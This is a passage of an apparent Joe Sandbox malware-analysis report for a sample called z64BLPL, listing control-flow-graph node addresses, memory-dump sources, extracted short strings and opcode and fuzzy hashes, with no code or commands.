                                                          control_flow_graph 1151 d329ec-d329f6 1153 d32981-d3298a 1151->1153 1154 d329f8-d32a01 1151->1154 1155 d32990 1153->1155 1154->1155 1156 d32a03-d32a0c 1154->1156 1159 d32997 1155->1159 1157 d32999 1156->1157 1158 d32a0e-d32a3b 1156->1158 1161 d329a0-d329c8 1157->1161 1162 d32a5d-d32aac 1158->1162 1163 d32a3d-d32a5c 1158->1163 1159->1157 1168 d32ac7-d32acf 1162->1168 1169 d32aae-d32ab5 1162->1169 1172 d32ad2-d32ae6 1168->1172 1170 d32ab7-d32abc 1169->1170 1171 d32abe-d32ac5 1169->1171 1170->1172 1171->1172 1175 d32ae8-d32aef 1172->1175 1176 d32afc-d32b04 1172->1176 1177 d32af1-d32af3 1175->1177 1178 d32af5-d32afa 1175->1178 1179 d32b06-d32b0a 1176->1179 1177->1179 1178->1179 1181 d32b6a-d32b6d 1179->1181 1182 d32b0c-d32b21 1179->1182 1183 d32bb5-d32bbb 1181->1183 1184 d32b6f-d32b84 1181->1184 1182->1181 1190 d32b23-d32b26 1182->1190 1185 d32bc1-d32bc3 1183->1185 1186 d336b6 1183->1186 1184->1183 1194 d32b86-d32b8a 1184->1194 1185->1186 1188 d32bc9-d32bce 1185->1188 1191 d336bb-d33700 1186->1191 1192 d33664-d33668 1188->1192 1193 d32bd4 1188->1193 1195 d32b45-d32b63 call d302c8 1190->1195 1196 d32b28-d32b2a 1190->1196 1213 d33702-d33728 1191->1213 1214 d3372e-d33874 1191->1214 1198 d3366a-d3366d 1192->1198 1199 d3366f-d336b5 1192->1199 1193->1192 1200 d32b92-d32bb0 call d302c8 1194->1200 1201 d32b8c-d32b90 1194->1201 1195->1181 1196->1195 1202 d32b2c-d32b2f 1196->1202 1198->1191 1198->1199 1200->1183 1201->1183 1201->1200 1202->1181 1203 d32b31-d32b43 1202->1203 1203->1181 1203->1195 1213->1214 1216 d338a6-d338a9 1214->1216 1217 d33876-d33878 1214->1217 1219 d338aa-d338bc 1216->1219 1217->1219 1221 d3387a-d338a3 1217->1221 1222 d338ee-d338f4 1219->1222 1223 d338be-d338eb 1219->1223 1221->1216 1225 d338f6-d33908 1222->1225 1226 d33928-d33937 1222->1226 1223->1222 1228 d3393a-d3393d 1225->1228 1229 d3390a-d3390c 1225->1229 1226->1228 1230 d3393e-d33941 1228->1230 1229->1230 1231 d3390e-d33910 1229->1231 1232 d33942-d339e8 1230->1232 1231->1232 1233 d33912-d33927 1231->1233 1233->1226
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4120408756.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d30000_z64BLPL.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Xbq$Xbq$Xbq$Xbq
                                                          • API String ID: 0-2732225958
                                                          • Opcode ID: 32109cf8d7ffcb1be80a5de5bcf472cf03007854e7de93cdd5502a554f4e85e4
                                                          • Instruction ID: e512ac644d488669f199ef33554952a9a475a7668e8640b626f4119474b1c312
                                                          • Opcode Fuzzy Hash: 32109cf8d7ffcb1be80a5de5bcf472cf03007854e7de93cdd5502a554f4e85e4
                                                          • Instruction Fuzzy Hash: 8BF1A63194A394CFDF524B7484A829BBF71EF47310F4A4CEAC846975A6CA384949CF71

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1234 d37118-d3713b 1235 d37146-d37166 1234->1235 1236 d3713d-d37143 1234->1236 1239 d37168 1235->1239 1240 d3716d-d37174 1235->1240 1236->1235 1241 d374fc-d37505 1239->1241 1242 d37176-d37181 1240->1242 1243 d37187-d3719a 1242->1243 1244 d3750d-d37521 1242->1244 1247 d371b0-d371cb 1243->1247 1248 d3719c-d371aa 1243->1248 1250 d37523-d37536 1244->1250 1251 d374f6-d374f9 1244->1251 1257 d371ef-d371f2 1247->1257 1258 d371cd-d371d3 1247->1258 1248->1247 1256 d37484-d3748b 1248->1256 1252 d374fa 1251->1252 1253 d3748d-d3748f 1251->1253 1252->1241 1252->1253 1259 d37491-d37496 1253->1259 1260 d3749e-d374a4 1253->1260 1256->1241 1256->1253 1261 d371f8-d371fb 1257->1261 1262 d3734c-d37352 1257->1262 1264 d371d5 1258->1264 1265 d371dc-d371df 1258->1265 1259->1260 1260->1244 1263 d374a6-d374ab 1260->1263 1261->1262 1268 d37201-d37207 1261->1268 1266 d37358-d3735d 1262->1266 1267 d3743e-d37441 1262->1267 1269 d374f0-d374f3 1263->1269 1270 d374ad-d374b2 1263->1270 1264->1262 1264->1265 1264->1267 1271 d37212-d37218 1264->1271 1265->1271 1272 d371e1-d371e4 1265->1272 1266->1267 1274 d37508 1267->1274 1279 d37447-d3744d 1267->1279 1268->1262 1277 d3720d 1268->1277 1273 d374f5 1269->1273 1269->1274 1270->1274 1278 d374b4 1270->1278 1280 d3721a-d3721c 1271->1280 1281 d3721e-d37220 1271->1281 1275 d371ea 1272->1275 1276 d3727e-d37284 1272->1276 1273->1251 1274->1244 1275->1267 1276->1267 1283 d3728a-d37290 1276->1283 1277->1267 1282 d374bb-d374c0 1278->1282 1284 d37472-d37476 1279->1284 1285 d3744f-d37457 1279->1285 1286 d3722a-d37233 1280->1286 1281->1286 1287 d374e2-d374e4 1282->1287 1288 d374c2-d374c4 1282->1288 1289 d37292-d37294 1283->1289 1290 d37296-d37298 1283->1290 1284->1256 1294 d37478-d3747e 1284->1294 1285->1244 1291 d3745d-d3746c 1285->1291 1292 d37246-d3726e 1286->1292 1293 d37235-d37240 1286->1293 1287->1274 1298 d374e6-d374e9 1287->1298 1295 d374d3-d374d9 1288->1295 1296 d374c6-d374cb 1288->1296 1297 d372a2-d372b9 1289->1297 1290->1297 1291->1247 1291->1284 1311 d37362-d37398 1292->1311 1312 d37274-d37279 1292->1312 1293->1267 1293->1292 1294->1242 1294->1256 1295->1244 1300 d374db-d374e0 1295->1300 1296->1295 1306 d372e4-d3730b 1297->1306 1307 d372bb-d372d4 1297->1307 1298->1269 1300->1287 1303 d374b6-d374b9 1300->1303 1303->1274 1303->1282 1306->1274 1317 d37311-d37314 1306->1317 1307->1311 1315 d372da-d372df 1307->1315 1318 d373a5-d373ad 1311->1318 1319 d3739a-d3739e 1311->1319 1312->1311 1315->1311 1317->1274 1320 d3731a-d37343 1317->1320 1318->1274 1323 d373b3-d373b8 1318->1323 1321 d373a0-d373a3 1319->1321 1322 d373bd-d373c1 1319->1322 1320->1311 1335 d37345-d3734a 1320->1335 1321->1318 1321->1322 1324 d373c3-d373c9 1322->1324 1325 d373e0-d373e4 1322->1325 1323->1267 1324->1325 1327 d373cb-d373d3 1324->1327 1328 d373e6-d373ec 1325->1328 1329 d373ee-d3740d call d376f1 1325->1329 1327->1274 1331 d373d9-d373de 1327->1331 1328->1329 1330 d37413-d37417 1328->1330 1329->1330 1330->1267 1333 d37419-d37435 1330->1333 1331->1267 1333->1267 1335->1311
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4120408756.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d30000_z64BLPL.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (o^q$(o^q$,bq$,bq
                                                          • API String ID: 0-879173519
                                                          • Opcode ID: 99028e716c96d33bb8ec9c9a17883f5c50c6595f5b356f473d8766035bde7fa2
                                                          • Instruction ID: 1a6facd7078cd31cd3cbc928dac1f2a7bdab5bdc85c9cb48ee359da783cd4094
                                                          • Opcode Fuzzy Hash: 99028e716c96d33bb8ec9c9a17883f5c50c6595f5b356f473d8766035bde7fa2
                                                          • Instruction Fuzzy Hash: 7FE130B1A04619DFCB25CF69D884AADBBF2BF48301F298065E855EB365D730EC41DB60
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4125146459.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6690000_z64BLPL.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: N
                                                          • API String ID: 0-1130791706
                                                          • Opcode ID: 404ff21865e1d4a3b7a9af1de3e4befb12c55d870fe191cdaee918279f0820d9
                                                          • Instruction ID: 1cccbe9bfa188391401b6dda487eeeb93a526645c0355a2c40dca53645c2d699
                                                          • Opcode Fuzzy Hash: 404ff21865e1d4a3b7a9af1de3e4befb12c55d870fe191cdaee918279f0820d9
                                                          • Instruction Fuzzy Hash: 4E73E731D1075A8EDB11EF68C854A99FBB1FF99300F11D69AE44977221EB70AAC4CF81
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4125146459.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6690000_z64BLPL.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: K
                                                          • API String ID: 0-856455061
                                                          • Opcode ID: bedb5e4342ca6256479e4decccbcc4850a861db9dd7b5f3b155a91643c05fdaf
                                                          • Instruction ID: adafcaecf3c934c7375b959ea37854e44151389febfc80d199d0a9489e7fec0e
                                                          • Opcode Fuzzy Hash: bedb5e4342ca6256479e4decccbcc4850a861db9dd7b5f3b155a91643c05fdaf
                                                          • Instruction Fuzzy Hash: AA33E530C146198EDB51EFA8C854A9DFBB5FF99300F10D69AE45877221EB70AAC4CF91
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4120408756.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d30000_z64BLPL.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (o^q$4'^q
                                                          • API String ID: 0-273632683
                                                          • Opcode ID: ecfd6a18ff43a91bc90b0d2e33a750a535b7a0ed0aea62f97efbec711c65a604
                                                          • Instruction ID: b625c3b44fb5f27bb6748014020e2bfaf322392039bf4aec22c6fe28a081e063
                                                          • Opcode Fuzzy Hash: ecfd6a18ff43a91bc90b0d2e33a750a535b7a0ed0aea62f97efbec711c65a604
                                                          • Instruction Fuzzy Hash: C5823B71B00209DFCB15CFACC984AAEBBF2BF48314F15855AE8859B265D731ED41CB62
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4120408756.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d30000_z64BLPL.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (o^q$Hbq
                                                          • API String ID: 0-662517225
                                                          • Opcode ID: f3698c0f822bb6f43f019cf1f1087943162be55131a7a0483dc5e131e16f5729
                                                          • Instruction ID: edf5313ac24d38c95c625b2d96657a8225419afdde0a51e096b0ab66fa89a4cd
                                                          • Opcode Fuzzy Hash: f3698c0f822bb6f43f019cf1f1087943162be55131a7a0483dc5e131e16f5729
                                                          • Instruction Fuzzy Hash: 94125B71A002199FCB14DF69D854AAEBBF6BF88300F24C569E945EB391DB30DD45CBA0
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4125146459.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6690000_z64BLPL.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0ca39c6d044028b939f9e2f6e7b437c0249c449292876c880391a111b9ab9ec1
                                                          • Instruction ID: c1a01b90db7120bd1054bcced6105a29ab9a3c2c0f82a728df69ec8648b432f2
                                                          • Opcode Fuzzy Hash: 0ca39c6d044028b939f9e2f6e7b437c0249c449292876c880391a111b9ab9ec1
                                                          • Instruction Fuzzy Hash: C3F1F674D01218CFDB54DFA9D884B9DBBB6BF88304F14C2A9E808AB355DB349985CF60
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4125146459.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6690000_z64BLPL.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: K
                                                          • API String ID: 0-856455061
                                                          • Opcode ID: 57e0d220e3d0f7d31993ac4e26a7f4d6523e7f6499eaf3dda07c2de04ef73695
                                                          • Instruction ID: c8d9997b7f53de19af5e89c31d4c7ead3a014b5b0135ac3b7a29f3de4405fb0f
                                                          • Opcode Fuzzy Hash: 57e0d220e3d0f7d31993ac4e26a7f4d6523e7f6499eaf3dda07c2de04ef73695
                                                          • Instruction Fuzzy Hash: A4C14770D056188FDB51DFA9C88479DFBB1FF89300F14D29AE408AB261EB74AA85CF50
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4125146459.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6690000_z64BLPL.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3fba4ab74e9a81268d7c8a47fe1f63a62c8b673a2e88599025154cfd7380f1c7
                                                          • Instruction ID: db1ba2a788be1d24cc0638f4c3d8c9891c8326b3a22712e323e4e920a04901af
                                                          • Opcode Fuzzy Hash: 3fba4ab74e9a81268d7c8a47fe1f63a62c8b673a2e88599025154cfd7380f1c7
                                                          • Instruction Fuzzy Hash: 8072CF74E012298FDB64DF69C984BDDBBB6BB49300F2491E9D808A7355DB349E82CF50
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4125146459.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6690000_z64BLPL.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b7c7a127e1ba9937100ce1eb64327714cebc9415f292434809c9ec44ae46666a
                                                          • Instruction ID: 03408c8e215867303978195cc5f37eb42fc34c92fbaeb4e885aa6b2532569561
                                                          • Opcode Fuzzy Hash: b7c7a127e1ba9937100ce1eb64327714cebc9415f292434809c9ec44ae46666a
                                                          • Instruction Fuzzy Hash: 8DC1B278E01218DFDB54DFA5D994B9DBBB6FF88300F2081A9D809A7364DB359A85CF10
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4125146459.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6690000_z64BLPL.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2a36741f1e0e73f415116e81e4a664182086b65a1bb853c80abfef12bf7de1bf
                                                          • Instruction ID: 6f8f030b6cae16b34093ce2e7bb6c845895c8884a74646d2e777f342f3696c5c
                                                          • Opcode Fuzzy Hash: 2a36741f1e0e73f415116e81e4a664182086b65a1bb853c80abfef12bf7de1bf
                                                          • Instruction Fuzzy Hash: 7BA1B470E012189FEB68CF6AD954B9DFBF6BF88300F14C0A9D408A7254DB345A85CF51
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4125146459.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6690000_z64BLPL.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8c5e5489841977402f2b98da8300c4d1c9809e0f75d5a83c342df11ad1b998bc
                                                          • Instruction ID: f47ef9ff8f50a8f3d279dcc3f0d309ccf7334840c449a1087b6b4cd7deb723ae
                                                          • Opcode Fuzzy Hash: 8c5e5489841977402f2b98da8300c4d1c9809e0f75d5a83c342df11ad1b998bc
                                                          • Instruction Fuzzy Hash: B0A1E270D002088FDB14DFA9D988B9DBBB1FF89314F209269E409B73A1DB749985CF65
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4125146459.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6690000_z64BLPL.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 84e67be255bd912f818c746890cff3ec0c99d781d8a3bb98243952a98712fbe8
                                                          • Instruction ID: 6c4ced1ea2b417f8eada9845d6caa37d55df90f792726c1e76a046467bbc1ddd
                                                          • Opcode Fuzzy Hash: 84e67be255bd912f818c746890cff3ec0c99d781d8a3bb98243952a98712fbe8
                                                          • Instruction Fuzzy Hash: F6A10374D002088FDB14DFA9D984BDDBBB1FF89304F209269E408AB3A1DB749985CF65
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4125146459.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6690000_z64BLPL.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 23c53f2f3288929f1cadf3bc7f2552752dfbcc6d352d30fb5560f7498d9c35bd
                                                          • Instruction ID: 3679cc8b2e66e2b7f03c78426b2961f0b58154c40db515b0757fb7715af2c6f1
                                                          • Opcode Fuzzy Hash: 23c53f2f3288929f1cadf3bc7f2552752dfbcc6d352d30fb5560f7498d9c35bd
                                                          • Instruction Fuzzy Hash: A2A1A375E012198FEB68CF6AD944B9DFBF2BF89300F14C1AAD808A7254DB345A85CF51
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4120408756.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d30000_z64BLPL.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 91de9052f1d5e8639c262e033f6c94b259557cd285444d14e0349c26e163541c
                                                          • Instruction ID: 00571d56c88fa5cff80e1f64915143e9276dd412d5043978fbd802f05d0e1fd8
                                                          • Opcode Fuzzy Hash: 91de9052f1d5e8639c262e033f6c94b259557cd285444d14e0349c26e163541c
                                                          • Instruction Fuzzy Hash: 5C91B374E00218DFDB14DFA9D990A9EBBB2FF88300F248129E814BB358DB759946CF54
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4125146459.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6690000_z64BLPL.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 360e463e729a98e6a25d6582b758c11959c214933d11feed0011f33e920fd8eb
                                                          • Instruction ID: 406bbe921901cd610deaf70adbf23fcdda298e2bf02e2be13b9e81de196fa35d
                                                          • Opcode Fuzzy Hash: 360e463e729a98e6a25d6582b758c11959c214933d11feed0011f33e920fd8eb
                                                          • Instruction Fuzzy Hash: 0A91E174D002088FDB50DFA8D888B9DBBB5FF49310F209269E409BB3A1DB709985CF64
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4125146459.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6690000_z64BLPL.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7ba0e647a3352e3b5469ad692de5ac04e046fba1c9dd6b264a991ed88bfd4a86
                                                          • Instruction ID: cd306114d9ce00550baf258ee45dfec800b1d7c8e57e7e1f1b223222fa265da3
                                                          • Opcode Fuzzy Hash: 7ba0e647a3352e3b5469ad692de5ac04e046fba1c9dd6b264a991ed88bfd4a86
                                                          • Instruction Fuzzy Hash: 9571C475D01218CFDB68DF66C9847DDBBB2BF89301F1480AAD809A7354DB345A86CF50
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4125146459.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6690000_z64BLPL.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b220b8398a5c4211c1998fa4ce2d57fedeca7170748031c86583b74a092523c8
                                                          • Instruction ID: 355364d53a92b6e63e159c59c202c6f06e65d3ef46d9eefaf13a95ae8b1291de
                                                          • Opcode Fuzzy Hash: b220b8398a5c4211c1998fa4ce2d57fedeca7170748031c86583b74a092523c8
                                                          • Instruction Fuzzy Hash: C271A7B1E016198FEB68CF6AD944B9DFBF2BF89300F14C1AAD408A7254DB744A85CF51
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4120408756.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d30000_z64BLPL.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d0c07e03ce7203950ec6484d94edd743362507bc6064cb68ad11aea13ddfa3a5
                                                          • Instruction ID: e2682f00b8d3699afc14d34b6aa41ddb72c71e54494ce3214e8cbe58f4483175
                                                          • Opcode Fuzzy Hash: d0c07e03ce7203950ec6484d94edd743362507bc6064cb68ad11aea13ddfa3a5
                                                          • Instruction Fuzzy Hash: 66519974E00208DFDB18DFA9D594A9DBBF2FF88300F249029E815AB3A4DB319945CF51
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4120408756.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d30000_z64BLPL.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 62a80c6a98a1fc66c254348e108964d5e74cadf435b7ee5f1c18148529f642b4
                                                          • Instruction ID: 4d8e23e828f8372f10dc77f41a480a8051956a83a0fef93b0c3f4163e1eb5e59
                                                          • Opcode Fuzzy Hash: 62a80c6a98a1fc66c254348e108964d5e74cadf435b7ee5f1c18148529f642b4
                                                          • Instruction Fuzzy Hash: 0551A974E00208DFDB18DFAAD994A9DBBB2FF88300F249029E815BB3A5DB315945CF55
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4125146459.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6690000_z64BLPL.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c9c3fcb1fa0b401d33a36ebfe2e32180ad25f110ca22a1f90e863d9081ebf971
                                                          • Instruction ID: 61d519c73b336db67fa3590e17fb4561a4839b81b623ea29f49513f302202e0c
                                                          • Opcode Fuzzy Hash: c9c3fcb1fa0b401d33a36ebfe2e32180ad25f110ca22a1f90e863d9081ebf971
                                                          • Instruction Fuzzy Hash: 704187B1E016188BEB58CF5BC95478EFAF7AFC9304F14C1AAC40CA6254EB740A868F51

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 527 d376f1-d37725 528 d37b54-d37b58 527->528 529 d3772b-d3774e 527->529 530 d37b71-d37b7f 528->530 531 d37b5a-d37b6e 528->531 538 d37754-d37761 529->538 539 d377fc-d37800 529->539 535 d37b81-d37b96 530->535 536 d37bf0-d37c05 530->536 545 d37b98-d37b9b 535->545 546 d37b9d-d37baa 535->546 547 d37c07-d37c0a 536->547 548 d37c0c-d37c19 536->548 551 d37763-d3776e 538->551 552 d37770 538->552 542 d37802-d37810 539->542 543 d37848-d37851 539->543 542->543 563 d37812-d3782d 542->563 549 d37c67 543->549 550 d37857-d37861 543->550 553 d37bac-d37bed 545->553 546->553 554 d37c1b-d37c56 547->554 548->554 557 d37c6c-d37c9c 549->557 550->528 555 d37867-d37870 550->555 558 d37772-d37774 551->558 552->558 602 d37c5d-d37c64 554->602 561 d37872-d37877 555->561 562 d3787f-d3788b 555->562 590 d37cb5-d37cbc 557->590 591 d37c9e-d37cb4 557->591 558->539 565 d3777a-d377dc 558->565 561->562 562->557 568 d37891-d37897 562->568 582 d3783b 563->582 583 d3782f-d37839 563->583 614 d377e2-d377f9 565->614 615 d377de 565->615 570 d37b3e-d37b42 568->570 571 d3789d-d378ad 568->571 570->549 575 d37b48-d37b4e 570->575 580 d378c1-d378c3 571->580 581 d378af-d378bf 571->581 575->528 575->555 588 d378c6-d378cc 580->588 581->588 589 d3783d-d3783f 582->589 583->589 588->570 596 d378d2-d378e1 588->596 589->543 597 d37841 589->597 599 d378e7 596->599 600 d3798f-d379ba call d37538 * 2 596->600 597->543 604 d378ea-d378fb 599->604 618 d379c0-d379c4 600->618 619 d37aa4-d37abe 600->619 604->557 607 d37901-d37913 604->607 607->557 610 d37919-d37931 607->610 672 d37933 call d380c9 610->672 673 d37933 call d380d8 610->673 613 d37939-d37949 613->570 617 d3794f-d37952 613->617 614->539 615->614 620 d37954-d3795a 617->620 621 d3795c-d3795f 617->621 618->570 624 d379ca-d379ce 618->624 619->528 639 d37ac4-d37ac8 619->639 620->621 622 d37965-d37968 620->622 621->549 621->622 625 d37970-d37973 622->625 626 d3796a-d3796e 622->626 628 d379d0-d379dd 624->628 629 d379f6-d379fc 624->629 625->549 630 d37979-d3797d 625->630 626->625 626->630 640 d379df-d379ea 628->640 641 d379ec 628->641 631 d37a37-d37a3d 629->631 632 d379fe-d37a02 629->632 630->549 634 d37983-d37989 630->634 636 d37a49-d37a4f 631->636 637 d37a3f-d37a43 631->637 632->631 635 d37a04-d37a0d 632->635 634->600 634->604 644 d37a0f-d37a14 635->644 645 d37a1c-d37a32 635->645 642 d37a51-d37a55 636->642 643 d37a5b-d37a5d 636->643 637->602 637->636 646 d37b04-d37b08 639->646 647 d37aca-d37ad4 call d363e0 639->647 650 d379ee-d379f0 640->650 641->650 642->570 642->643 648 d37a92-d37a94 643->648 649 d37a5f-d37a68 643->649 644->645 645->570 646->602 657 d37b0e-d37b12 646->657 647->646 660 d37ad6-d37aeb 647->660 648->570 655 d37a9a-d37aa1 648->655 653 d37a77-d37a8d 649->653 654 d37a6a-d37a6f 649->654 650->570 650->629 653->570 654->653 657->602 658 d37b18-d37b25 657->658 663 d37b27-d37b32 658->663 664 d37b34 658->664 660->646 669 d37aed-d37b02 660->669 666 d37b36-d37b38 663->666 664->666 666->570 666->602 669->528 669->646 672->613 673->613
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4120408756.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d30000_z64BLPL.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (o^q$(o^q$(o^q$(o^q$(o^q$(o^q$,bq$,bq
                                                          • API String ID: 0-1932283790
                                                          • Opcode ID: 09b5a32783c0f996d2869787449183560ca3e7e01b9167c69b90cd0966da73b4
                                                          • Instruction ID: 786ce531d21d6580ac1fa41a42039b97ef8f391924eba444310acf42a07a6046
                                                          • Opcode Fuzzy Hash: 09b5a32783c0f996d2869787449183560ca3e7e01b9167c69b90cd0966da73b4
                                                          • Instruction Fuzzy Hash: FB124970A04A099FCB24CF69D984AAEBBF1FF48314F188569E859DB361D730ED45CB60
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4120408756.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d30000_z64BLPL.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Hbq$Hbq
                                                          • API String ID: 0-4258043069
                                                          • Opcode ID: aa90a2932ffeb3512733ec284b80251ee5c4f577b66189df890d0da6a41a2794
                                                          • Instruction ID: baa27793f5c717cbccf7254fc13021ba1a96440d00057305973b3a09760eb77a
                                                          • Opcode Fuzzy Hash: aa90a2932ffeb3512733ec284b80251ee5c4f577b66189df890d0da6a41a2794
                                                          • Instruction Fuzzy Hash: F891AB303043549FDB199F28D854B6E7BA6BF88301F188569E846CB3A6DF75CC42DBA1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4120408756.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d30000_z64BLPL.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ,bq$,bq
                                                          • API String ID: 0-2699258169
                                                          • Opcode ID: 1e14d58b619f1828f8e6c7ac2e5be3ea93fd31e8174c952190f8431dd28dc5cc
                                                          • Instruction ID: e07d9c8e593f3ee6f2bba5eeb36b9530c89aa2a6f77c0f6c8800d2337e6396c8
